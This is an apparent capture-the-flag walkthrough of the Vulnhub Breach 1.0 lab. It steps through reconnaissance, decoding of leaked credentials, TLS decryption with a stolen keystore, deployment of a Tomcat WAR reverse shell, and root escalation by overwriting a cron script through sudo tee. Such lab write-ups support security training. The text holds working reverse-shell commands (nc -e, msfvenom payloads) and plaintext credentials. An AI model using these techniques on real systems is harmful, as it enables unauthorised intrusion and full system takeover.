Breach Lab

Lab environment: Breach 1.0
Attack environment: Kali 2 Linux
IP configuration: set the VMware host-only network segment to 192.168.110.0 and put every attacking machine in host-only mode.

Download Breach 1.0 from Vulnhub, unzip it and import it into VMware. After importing, set the host-only network segment to 192.168.110.0 and switch all attacking machines to host-only mode:



After a reboot the attacker and the target can talk to each other (apparently it also works without rebooting :(

Tools

arp-scan
masscan
nmap
nikto
nc
firefox
burp suite
wireshark
msf

Information gathering

We use arp-scan to find the target's IP: 192.168.110.140 is our target machine.

Now we scan the target 192.168.110.140 with nmap. For some reason the target shows every port as open, so we go straight to port 80 and find a website.

Seeing a website, as a newbie I throw a scanner at it first, using Kali's built-in nikto to scan the service on port 80:

root@kali# nikto -host 192.168.110.140 -output 192.168.110.140_nikto.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.110.140
+ Target Hostname: 192.168.110.140
+ Target Port: 80
+ Start Time: 2019-06-27 13:56:20 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 44a, size: 534a04f49139d, mtime: gzip
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /.gitignore: .gitignore file found. It is possible to grasp the directory structure.
+ 7916 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2019-06-27 13:57:29 (GMT8) (69 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

We find an images directory. Looking inside, there are a few pictures, purpose unknown.

Try strings on the pictures: bill.png contains two notable strings, tEXtComment and coffeestains. It is not clear yet what they are for, so we note them down for later.

Vulnerability discovery

Browsing the site's source code we find a string that looks like base64: Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo. Extract it and decode it with Burp Suite.

After two rounds of base64 decoding we get a username and password: pgibbons:damnitfeel$goodtobeagang$ta

We also find initech.html. Visiting it reveals a CMS, so the decoded username and password should be the login for this CMS. Try logging in: success!


After logging in there are three emails. The third one mentions a file, .keystore, which we download.

Searching the mails for "ssl" turns up a download link for an SSL capture, a pcap file. The mail also hints that the username and password are both tomcat, so we guess there is a Tomcat site, and since it says this is a red team attack capture (not sure I understood that correctly), the connection to the Tomcat site should be inside it. Download the pcap and analyse it in Wireshark! Unfortunately all the TCP traffic is encrypted. We remember the .keystore downloaded earlier, which should be the Tomcat keystore file; inspect it with keytool using the password tomcat.

root@kali:~# keytool -list -v -keystore keystore
输入密钥库口令:
密钥库类型: JKS
密钥库提供方: SUN

您的密钥库包含 1 个条目

别名: tomcat
创建日期: 2016年5月21日
条目类型: PrivateKeyEntry
证书链长度: 1
证书[1]:
所有者: CN=Unknown, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown
发布者: CN=Unknown, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown
序列号: 60856e88
生效时间: Sat May 21 01:51:07 CST 2016, 失效时间: Fri Aug 19 01:51:07 CST 2016
证书指纹:
SHA1: D5:D2:49:C3:69:93:CC:E5:39:A9:DE:5C:91:DC:F1:26:A6:40:46:53
SHA256: F0:4A:E8:7F:52:C1:78:B4:14:2B:4D:D9:1A:34:31:F7:19:0A:29:F6:0C:85:00:0B:58:3A:37:20:6C:7E:E6:31
签名算法名称: SHA256withRSA
主体公共密钥算法: 2048 位 RSA 密钥
版本: 3

扩展:

#1: ObjectId: 2.5.29.14 Criticality=false
SubjectKeyIdentifier [
KeyIdentifier [
0000: 47 6B A3 37 ED A5 1F 0A 0D 61 CA AA 17 9C F4 8C Gk.7.....a......
0010: 10 64 87 DF .d..
]
]



*******************************************
*******************************************



Warning:
JKS 密钥库使用专用格式。建议使用 "keytool -importkeystore -srckeystore keystore -destkeystore keystore -deststoretype pkcs12" 迁移到行业标准格式 PKCS12。

Then try to extract the private key from the keystore:

root@kali:~# keytool -v -importkeystore -srckeystore keystore -srcalias tomcat -destkeystore myp12file.p12 -deststoretype PKCS12
正在将密钥库 keystore 导入到 myp12file.p12...
输入目标密钥库口令:
再次输入新口令:
输入源密钥库口令:
[正在存储myp12file.p12]
root@kali:~# ls
公共 模板 视频 图片 文档 下载 音乐 桌面 core keystore myp12file.p12

Check the private key:

root@kali:~# openssl pkcs12 -in myp12file.p12 -nocerts -nodes
Enter Import Password:
Bag Attributes
friendlyName: tomcat
localKeyID: 54 69 6D 65 20 31 35 36 31 36 32 37 37 33 35 30 34 38
Key Attributes: <No Attributes>
-----BEGIN PRIVATE KEY-----
...
-----END PRIVATE KEY-----

Import the private key into Wireshark, then reload _SSL_test_phase1.pcap.

Now we can see the decrypted data and find the Tomcat manager URL https://192.168.110.140:8443/_M@nag3Me/html

Following the HTTP stream of that GET request, we find Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC, which is the base64-encoded Tomcat login.

Base64-decode it with Burp Suite to get the username tomcat and the password Tt\5D8F(#!*u=G)4m7zB
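Both strings above, the double-encoded blob from the page source and the Basic header from the decrypted capture, are base64, which is an encoding and not encryption. As an added example, not from the original write-up, this Python peels nested base64 layers and splits a Basic Authorization value into user and password; the two input strings are the ones quoted on this page.

```python
import base64
import binascii
import re

# Strict base64 alphabet check; the length must also be a multiple of 4.
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def peel_base64(token, max_layers=5):
    """Decode base64 repeatedly while each result is still well-formed base64.
    Returns every layer, outermost first, ending with the innermost text.
    Caveat: a plaintext that happens to be valid base64 would be peeled too."""
    layers, current = [token], token
    for _ in range(max_layers):
        if len(current) % 4 or not B64_RE.match(current):
            break
        try:
            decoded = base64.b64decode(current, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break  # binary or non-base64 content: stop peeling
        layers.append(decoded)
        current = decoded
    return layers


def decode_basic_auth(header_value):
    """Turn an 'Authorization: Basic <b64>' value into (user, password).
    Returns None for another scheme or a token that does not decode to user:pass."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        creds = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = creds.partition(":")
    return (user, password) if sep else None


# The two strings quoted in the walkthrough above.
PAGE_SOURCE_BLOB = "Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo"
AUTH_HEADER = "Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC"

if __name__ == "__main__":
    for depth, layer in enumerate(peel_base64(PAGE_SOURCE_BLOB)):
        print(f"layer {depth}: {layer}")
    print("basic auth ->", decode_basic_auth(AUTH_HEADER))
```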

Note: I could not load the page directly in Firefox, and other browsers could not load it either! But with Burp Proxy in front as a proxy, I was able to add an exception in Firefox and reach the Tomcat page. The same method works for other browsers.

Getting a shell

From the first two lines above, the login URL should be https://192.168.110.140:8443/_M@nag3Me/html; log in to the Tomcat manager.

Deploy a WAR package to get a shell. Because the description says a script cleans up files every three minutes, we need a reverse shell.

Run the reverse shell command from the web shell:
nc -e /bin/bash 192.168.110.128 19888
Listen on Kali and the shell comes back to us:
nc -lvvp 19888

Of course you can also upload a JSP shell generated with msfvenom through the Tomcat manager and start a listener on Kali!

Generate a WAR webshell with the following command:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.129 LPORT=4444 -f war > shell.war
Then set up msfconsole as the listener; once the uploaded webshell is triggered it returns a reverse shell:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set Payload java/jsp_shell_reverse_tcp
Payload => java/jsp_shell_reverse_tcp
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (java/jsp_shell_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL no The system shell to use.


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf5 exploit(multi/handler) > set lhost 192.168.110.128
lhost => 192.168.110.128
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (java/jsp_shell_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.110.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL no The system shell to use.


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.110.128:4444
[*] Command shell session 1 opened (192.168.110.128:4444 -> 192.168.110.140:36310) at 2019-07-01 00:19:08 +0800

id
uid=104(tomcat6) gid=112(tomcat6) groups=112(tomcat6)

Check the system's users, looking for ids from 1000 upwards: cat /etc/passwd
We find two users worth noting, milton and blumbergh.

[*] Command shell session 2 opened (192.168.110.128:4444 -> 192.168.110.140:36312) at 2019-07-01 00:30:32 +0800

id
uid=104(tomcat6) gid=112(tomcat6) groups=112(tomcat6)
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
milton:x:1000:1000:Milton_Waddams,,,:/home/milton:/bin/bash
tomcat6:x:104:112::/usr/share/tomcat6:/bin/false
colord:x:105:114:colord colour management daemon,,,:/var/lib/colord:/bin/false
mysql:x:106:116:MySQL Server,,,:/nonexistent:/bin/false
blumbergh:x:1001:1001:Bill Lumbergh,,,:/home/blumbergh:/bin/bash

Privilege escalation

From our earlier notes we have the string coffeestains found in bill.png, which looks a lot like a password, and now we have Bill's account name blumbergh.
So su to blumbergh with the password coffeestains.

Note: plain su does not work here; the su command fails saying it needs a terminal. This is fixed with Python:
python -c 'import pty;pty.spawn("/bin/bash")'

id
uid=104(tomcat6) gid=112(tomcat6) groups=112(tomcat6)
python -c 'import pty;pty.spawn("/bin/bash")'
tomcat6@Breach:/home$ su blumbergh
su blumbergh
Password: coffeestains

blumbergh@Breach:/home$ id
id
uid=1001(blumbergh) gid=1001(blumbergh) groups=1001(blumbergh)
blumbergh@Breach:/home$
blumbergh@Breach:/home$ cd ~
cd ~
blumbergh@Breach:~$ ls -al
ls -al
total 28
drwxr-xr-x 3 blumbergh blumbergh 4096 Jun 12 2016 .
drwxr-xr-x 4 root root 4096 Jun 4 2016 ..
-rw------- 1 blumbergh blumbergh 61 Jun 12 2016 .bash_history
-rw-r--r-- 1 blumbergh blumbergh 220 Jun 4 2016 .bash_logout
-rw-r--r-- 1 blumbergh blumbergh 3637 Jun 4 2016 .bashrc
drwx------ 2 blumbergh blumbergh 4096 Jun 6 2016 .cache
-rw-r--r-- 1 blumbergh blumbergh 675 Jun 4 2016 .profile
blumbergh@Breach:~$ cat .bash_history
cat .bash_history
clear
logoff
logout
exit
cd /usr/share/cleanup
cat tidyup.sh
blumbergh@Breach:~$ locate tidyup.sh
locate tidyup.sh
/usr/share/cleanup/tidyup.sh
blumbergh@Breach:~$ ls -al /usr/share/cleanup/tidyup.sh
ls -al /usr/share/cleanup/tidyup.sh
-rwxr-xr-x 1 root root 289 Jun 12 2016 /usr/share/cleanup/tidyup.sh
blumbergh@Breach:~$ cat /usr/share/cleanup/tidyup.sh
cat /usr/share/cleanup/tidyup.sh
#!/bin/bash

#Hacker Evasion Script
#Initech Cyber Consulting, LLC
#Peter Gibbons and Michael Bolton - 2016
#This script is set to run every 3 minutes as an additional defense measure against hackers.

cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf
blumbergh@Breach:~$ sudo -l
sudo -l
Matching Defaults entries for blumbergh on Breach:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User blumbergh may run the following commands on Breach:
(root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh
blumbergh@Breach:~$

Reverse shell as root and grab the flag

We now know that tidyup.sh runs automatically every 3 minutes, and blumbergh can run /usr/bin/tee /usr/share/cleanup/tidyup.sh as root, so that command lets us rewrite the tidyup.sh script into a malicious shell.
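As an added example from the defender's side (not part of the original write-up), this Python audits sudo -l output for exactly this pattern: a rule that lets a user run a file-writing command as root against a script that root executes unattended. The FILE_WRITERS list, the sample sudo -l text and the assumed root crontab entry in ROOT_CRON_SCRIPTS are constructed here.

```python
import re

# Binaries whose job is to write their input to an arbitrary path.
FILE_WRITERS = {"tee", "cp", "dd", "mv", "install"}
# One `sudo -l` rule line: "(runas) [TAG: ...] /path/cmd [args]".
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)"
                     r"(?P<cmd>\S+)\s*(?P<args>.*)$")

def parse_sudo_l(text):
    """Return the rules listed under 'may run the following commands'."""
    rules, in_rules = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules and line else None
        if m:
            rules.append({"runas": m.group("runas").strip(), "cmd": m.group("cmd"),
                          "nopasswd": "NOPASSWD:" in m.group("tags"),
                          "args": m.group("args").split()})
    return rules

def root_write_findings(rules, root_executed):
    """Flag rules letting the user write, as root, into a path root runs unattended.
    root_executed: cron/timer script paths. Finding = (command, target, nopasswd)."""
    findings = []
    for r in rules:
        if r["runas"].split(":")[0].strip() not in ("root", "ALL"):
            continue
        if r["cmd"].rsplit("/", 1)[-1] not in FILE_WRITERS:
            continue
        if not r["args"]:  # no argument restriction: any file at all
            findings.append((r["cmd"], "<any file>", r["nopasswd"]))
        for target in r["args"]:
            if target in root_executed:
                findings.append((r["cmd"], target, r["nopasswd"]))
    return findings

# Constructed sample: the rule from this box plus two variants for contrast.
SAMPLE_SUDO_L = """Matching Defaults entries for blumbergh on Breach:
    env_reset, mail_badpass

User blumbergh may run the following commands on Breach:
    (root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh
    (root) /usr/bin/ls /var/log
    (root) /usr/bin/tee
"""
ROOT_CRON_SCRIPTS = {"/usr/share/cleanup/tidyup.sh"}  # assumed: root's crontab entry
```

Running root_write_findings(parse_sudo_l(SAMPLE_SUDO_L), ROOT_CRON_SCRIPTS) reports the tee rule against tidyup.sh and the unrestricted tee rule, and leaves the ls rule alone.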

With nc listening on local port 7777, I run the following command to modify tidyup.sh so that it contains the malicious code:
echo "nc -e /bin/bash 192.168.110.128 7777" | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

blumbergh@Breach:~$ echo "nc -e /bin/bash 192.168.110.128 7777" | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
tee /usr/share/cleanup/tidyup.sh0.128 7777" | sudo /usr/bin/
nc -e /bin/bash 192.168.110.128 7777
blumbergh@Breach:~$

Listen on port 7777:
nc -lvnp 7777
After a short wait we get the root user! Run ls -la to see what's there; the flag is obvious and is our final goal: cat .flag.txt. OK, game cleared!

root@kali:~# nc -lvnp 7777
listening on [any] 7777 ...
connect to [192.168.110.128] from (UNKNOWN) [192.168.110.140] 51528
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/root
python -c 'import pty;pty.spawn("/bin/bash")'
root@Breach:~# ls -la
ls -la
total 60
drwx------ 4 root root 4096 Jun 12 2016 .
drwxr-xr-x 22 root root 4096 Jun 4 2016 ..
-rw------- 1 root root 115 Jun 12 2016 .bash_history
-rw-r--r-- 1 root root 3106 Feb 19 2014 .bashrc
drwx------ 2 root root 4096 Jun 6 2016 .cache
-rw-r--r-- 1 root root 840 Jun 11 2016 .flag.txt
-rw-r--r-- 1 root root 23792 Jun 4 2016 flair.jpg
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
drwxr-xr-x 2 root root 4096 Jun 5 2016 .rpmdb
-rw-r--r-- 1 root root 66 Jun 4 2016 .selected_editor
root@Breach:~# cat .flag.txt
cat .flag.txt
-----------------------------------------------------------------------------------

______ _ __ _____ _____ _ _____ _
| ___ \ | | / | | _ | |_ _| | | ___| | |
| |_/ /_ __ ___ __ _ ___| |__ `| | | |/' |______| | | |__ ___| |__ _ __ __| |
| ___ \ '__/ _ \/ _` |/ __| '_ \ | | | /| |______| | | '_ \ / _ \ __| '_ \ / _` |
| |_/ / | | __/ (_| | (__| | | || |_\ |_/ / | | | | | | __/ |__| | | | (_| |
\____/|_| \___|\__,_|\___|_| |_\___(_)___/ \_/ |_| |_|\___\____/_| |_|\__,_|


-----------------------------------------------------------------------------------
Congrats on reaching the end and thanks for trying out my first #vulnhub boot2root!

Shout-out to knightmare, and rastamouse for testing and g0tmi1k for hosting.

Summary:

1. A keystore is a file format for storing public and private keys

2. keytool

root@kali:~# # list every certificate in the keystore file
root@kali:~# keytool -list -v -keystore keystore
root@kali:~# # export a .p12 certificate from the keystore
root@kali:~# keytool -v -importkeystore -srckeystore keystore -srcalias tomcat -destkeystore myp12file.p12 -deststoretype PKCS12

3. Accessing TLS in Firefox

Go to about:config and add the string security.tls.insecure_fallback_hosts with the value 192.168.110.140
Proxy all protocols through port 8080

4. Generating the payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.128 LPORT=4444 -f war > shell.war

5. Fixing su with Python

python -c 'import pty;pty.spawn("/bin/bash")'

6. Privilege escalation with tee

echo "nc -e /bin/bash 192.168.110.128 7777" | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh